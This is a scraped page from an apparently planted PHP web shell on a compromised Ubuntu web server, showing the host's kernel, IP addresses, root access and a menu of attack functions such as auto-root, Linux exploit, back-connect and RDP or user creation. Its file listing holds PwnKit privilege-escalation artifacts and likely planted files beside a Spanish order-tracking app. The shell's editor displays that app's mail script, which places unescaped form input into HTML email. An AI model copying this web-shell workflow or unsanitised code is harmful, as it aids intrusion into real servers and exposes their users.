Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
Indicadores /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
500.shtml
71
B
-rwxrwxrwx
Almacen.php
2.44
KB
-rwxrwxrwx
IndicadoresCumplimiento.php
10.78
KB
-rwxrwxrwx
Notificacion.php
812
B
-rwxrwxrwx
Pedidos Cerrados Cumplidos.php
2.36
KB
-rwxrwxrwx
PedidosCerradosCumplidos.php
3.21
KB
-rwxrwxrwx
PedidosCerradosCumplidosA.php
2.8
KB
-rwxrwxrwx
PedidosCerradosNoCumplidos.php
3.2
KB
-rwxrwxrwx
PedidosEnProceso.php
3.22
KB
-rwxrwxrwx
PedidosNuevos.php
3.35
KB
-rwxrwxrwx
PedidosRecibidosconRetrasos.ph...
2.77
KB
-rwxrwxrwx
PedidosVencidos.php
3.15
KB
-rwxrwxrwx
PedidosporllegardeProduccion.p...
2.58
KB
-rwxrwxrwx
Planeacion.php
4.35
KB
-rwxrwxrwx
Produccion.php
2.62
KB
-rwxrwxrwx
ResumenAlmacen.php
5.75
KB
-rwxrwxrwx
ResumenPedidos.php
14.49
KB
-rwxrwxrwx
ResumenProduccion.php
8.94
KB
-rwxrwxrwx
UnicuadroSeleccion.php
6.58
KB
-rwxrwxrwx
acceso.php
1.36
KB
-rwxrwxrwx
class.phpmailer.php
88.75
KB
-rwxrwxrwx
class.smtp.php
30.33
KB
-rwxrwxrwx
comprobar.php
1.51
KB
-rwxrwxrwx
conexion.php
396
B
-rwxrwxrwx
correo.php
537
B
-rwxrwxrwx
email2.php
810
B
-rwxrwxrwx
email3.php
1.99
KB
-rwxrwxrwx
enviar.php
3.35
KB
-rwxrwxrwx
enviar_Almacen.php
2.27
KB
-rwxrwxrwx
enviar_produccion.php
2.51
KB
-rwxrwxrwx
error_log
8.33
MB
-rwxrwxrwx
favicon.ico
43
B
-rwxrwxrwx
index.php
4.13
KB
-rwxrwxrwx
login.php
260
B
-rwxrwxrwx
logout.php
210
B
-rwxrwxrwx
mail.php
309
B
-rwxrwxrwx
modificacion.php
9.52
KB
-rwxrwxrwx
modificacion2.php
5.57
KB
-rwxrwxrwx
modificar_almacen.php
5.6
KB
-rwxrwxrwx
modificar_produccion.php
6.48
KB
-rwxrwxrwx
perfil.php
806
B
-rwxrwxrwx
permisos.php
1021
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
registro.php
3.97
KB
-rwxrwxrwx
sugerencias_send.php
4.85
KB
-rwxrwxrwx
test.php
120
B
-rwxrwxrwx
tiempo.php
385
B
-rwxrwxrwx
unicuadro.php
3.96
KB
-rwxrwxrwx
unicuadromodificacion.php
3.56
KB
-rwxrwxrwx
usuarios.php
611
B
-rwxrwxrwx
validar_usuario.php
1.92
KB
-rwxrwxrwx
wp-blog-header.php
2.74
KB
-r--r--r--
wp-cron.php
2.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sugerencias_send.php
<?php // Primero hay que incluir la clase phpmailer para poder instanciar un objeto de la misma require "class.phpmailer.php"; // Instanciamos un objeto de la clase phpmailer al que llamamos por ejemplo mail $mail = new phpmailer(); // Señalamos los datos de envio que llevara nuestro correo $mail->From = "tucorreo@dominio.com"; // Direccion de correo de quien envia el mensaje $mail->FromName = "Tu nombre"; // Nombre de quien envia el mensaje $mail->Timeout=120; // El valor por defecto del timeout es 10 pero vamos a usar 120. $mail->AddAddress("xxxxx@gmail.com"); // Indicamos cual es la direccón de destino del correo, es decir, a donde se enviara // Indicamos en la cabecera si el correo contiene html. Esta línea es muy importante si nuestro correo va a contener html $mail->IsHTML(true); // Asunto del mensaje $mail->Subject = "Envio de Sugerencias"; // Aquí es donde incluiremos el correo el html, este html se puede editar con Dreamweaver o con cualiquier otro editor y despues pegarlo a continuacion de la comilla simple del metodo $cuerpo= $cuerpo=' <html> <head> <title>Envio de Sugerencias</title> <style type="text/css"> <!-- #datos { position:absolute; width:780px; left: 164px; top: 316px; text-align: center; } #apDiv1 #form1 table tr td { text-align: center; font-weight: bold; } #apDiv2 { position:absolute; width:49px; height:45px; z-index:2; left: 12px; top: 11px; } #apDiv1 #notificacion table tr td { text-align: center; } #apDiv1 #notificacion table tr td { text-align: left; } #apDiv1 #notificacion table tr td { text-align: center; font-family: Arial, Helvetica, sans-serif; } #apDiv3 { position:absolute; width:833px; height:115px; z-index:1; left: 99px; text-align: center; top: 16px; } --> </style> </head> <body> <div id="apDiv3"> <table width="100%" border="1" cellpadding="0" cellspacing="0" bordercolor="#000000"> <tr> <td><table width="100%" border="0"> <tr> <td style="text-align: center"><img src="imagenes/logo.jpg" width="284" height="166"></td> </tr> <tr> <td><p> </p> <p style="font-family: Helvetica LT Condensed; color: #008895; font-weight: bold; font-size: 22px; text-align: center;">ENVIO DE SUGERENCIAS</p></td> </tr> <tr> <td> </td> </tr> <tr> <td style="font-family: Helvetica LT Condensed; font-size: 18px;"><spanHelvetica LT Condensed"; font-size: 18px;"><span style="font-weight: bold">Nombre:</span> '.$_POST["nombre"].'</span> '.$_POST["ap_pat"].' <spanHelvetica LT Condensed"; font-size: 18px;">'.$_POST["ap_mat"].' </span></td> </tr> <tr> <td style="font-family: Helvetica LT Condensed; font-size: 18px;"><span style="font-weight: bold">Ciudad:</span> '.$_POST["ciudad"].'</td> </tr> <tr> <td style="font-family: Helvetica LT Condensed; font-size: 18px;"><span style="font-weight: bold">Correo Electrónico:</span> '.$_POST["email"].'</td> </tr> <tr> <td><p> </p> <p><span style="font-family: Helvetica LT Condensed; font-size: 18px;"><span style="font-weight: bold">Sugerencias:</span> '.$_POST["sugerencias"].'</span></p></td> </tr> <tr> <td> </td> </tr> </table></td> </tr> </table> </div> </body> </html> '; // Cerramos la comilla simple. Con la comilla simple y el punto y coma se finaliza el cuerpo del mensaje html. // Asignamos al atributo Body, la variable $cuerpo. $mail->Body = $cuerpo; // Definimos AltBody por si el destinatario (quien recive) del correo no admite email con formato html, es decir recibirá este mensaje si el servidor de correo al que enviamos el mensaje no puede admitir html $mail->AltBody = "Usted esta viendo este mensaje simple debido a que su servidor de correo no admite formato HTML."; // Se envia el mensaje, si no ha habido problemas la variable $exito tendra el valor true (verdadero) y el correo se habrá enviado satisfactoriamente. $exito = $mail->Send(); // Si el mensaje no ha podido ser enviado se realizaran 2 intentos mas como mucho para intentar enviar el mensaje, cada intento se hara 5 segundos despues del anterior, para ello se usa la funcion sleep $intentos=1; while ((!$exito) && ($intentos < 2)) { sleep(5); //echo $mail->ErrorInfo; $exito = $mail->Send(); $intentos=$intentos+1; } // Esta condicional nos sirve para que en caso de que haya error al enviar el mensaje se muestre el mensaje "Problemas nviando correo electronico" y en caso satisfactorio nos redirigira a la pagina sugerencias_enviadas.html if(!$exito) { echo "Problemas enviando correo electrónico"; echo "<br>".$mail->ErrorInfo; echo " "; } else { // Este script nos va a redirigir a la pagina sugerencias_enviadas.html echo "<script language=Javascript> location.href=\"sugerencias_enviadas.html\"; </script>"; echo " "; } ?>
Close